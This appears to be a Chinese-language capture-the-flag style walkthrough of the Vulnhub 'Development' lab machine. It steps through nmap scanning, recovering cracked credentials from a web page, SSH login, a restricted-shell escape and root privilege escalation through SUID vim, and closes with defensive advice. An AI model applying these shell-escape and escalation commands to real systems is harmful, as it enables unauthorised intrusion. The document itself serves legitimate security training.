OSCP-Vulnhub靶机记录-Development-walkthrough
字数 1340 2025-08-12 11:34:41
OSCP-Vulnhub靶机渗透测试:Development-walkthrough 详细教学文档
1. 靶机信息
- 靶机名称:Development
- 来源:Vulnhub
- 难度等级:中级
- 测试环境:VMware/VirtualBox虚拟环境
- IP地址:192.168.52.137(示例)
2. 渗透测试流程
2.1 主机发现
nmap -sS 192.168.52.0/24
- 使用Nmap进行SYN扫描发现靶机IP
- 确认靶机IP为192.168.52.137
2.2 信息收集
nmap -sS -sV -A -p- -T5 192.168.52.137 -oN devt.nmap
- 参数说明:
-sS: SYN扫描-sV: 服务版本检测-A: 全面扫描-p-: 扫描所有端口-T5: 最快速度扫描-oN: 输出到文件
2.3 端口扫描结果分析
- 开放端口:
- 22/tcp: SSH
- 80/tcp: HTTP
- 8080/tcp: HTTP代理服务
2.4 Web服务枚举
2.4.1 8080端口检查
- 发现隐藏页面:
html_pages - 存在IDS(入侵检测系统),导致常规目录扫描失败
2.4.2 源码分析
- 从页面源码中发现登录框
- 任意输入均返回错误信息
2.4.3 敏感信息泄露利用
- 通过拼接目录尝试发现敏感信息
- 发现MD5哈希值
- 使用在线工具解密获得以下凭证:
- patrick:P@ssw0rd25
- qiu:qiu
- intern:12345678900987654321
2.5 初始访问
2.5.1 SSH登录尝试
ssh intern@192.168.52.137
- 使用intern账户和对应密码成功登录
2.5.2 获取交互式shell
echo os.system('/bin/bash')
- 通过Python命令获取完整bash shell
2.6 权限提升路径
2.6.1 用户切换
- 检查
/etc/passwd发现patrick用户有/bin/bash权限 - 使用之前获得的密码切换用户:
su patrick
密码:P@ssw0rd25
2.6.2 SUID提权
- 检查具有SUID权限的可执行文件
- 发现vim编辑器具有SUID位
- 利用vim提权:
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
或
vim
:set shell=/bin/sh
:shell
3. 关键知识点总结
-
信息收集技巧:
- Nmap高级扫描参数的使用
- Web源码分析寻找隐藏信息
- 敏感目录的暴力破解
-
凭证获取方法:
- 通过页面源码发现隐藏凭证
- MD5哈希破解技术
- 常见弱密码尝试
-
绕过限制:
- IDS检测的规避方法
- 非交互式shell到交互式shell的转换
-
权限提升技术:
- SUID权限滥用
- Vim编辑器的提权利用
- 用户间切换技巧
4. 防御建议
-
系统加固:
- 移除不必要的SUID权限
- 禁用危险命令的SUID位
-
认证安全:
- 使用强密码策略
- 避免密码硬编码或泄露
- 实施多因素认证
-
日志监控:
- 监控异常登录尝试
- 记录特权命令执行
-
Web安全:
- 隐藏敏感信息
- 实施适当的访问控制
- 定期进行安全审计
5. 扩展学习
-
相关工具:
- Hashcat: 更强大的哈希破解工具
- LinPEAS: Linux权限提升枚举脚本
- GTFOBins: Linux二进制提权参考
-
类似靶机:
- Vulnhub上的"Kioptrix"系列
- HackTheBox上的Linux靶机
-
进阶技术:
- 内核漏洞提权
- 环境变量劫持
- Capabilities滥用
通过本案例的系统学习,可以掌握从信息收集到权限提升的完整渗透测试流程,特别关注了Web应用安全、凭证管理和Linux权限提升等关键安全领域。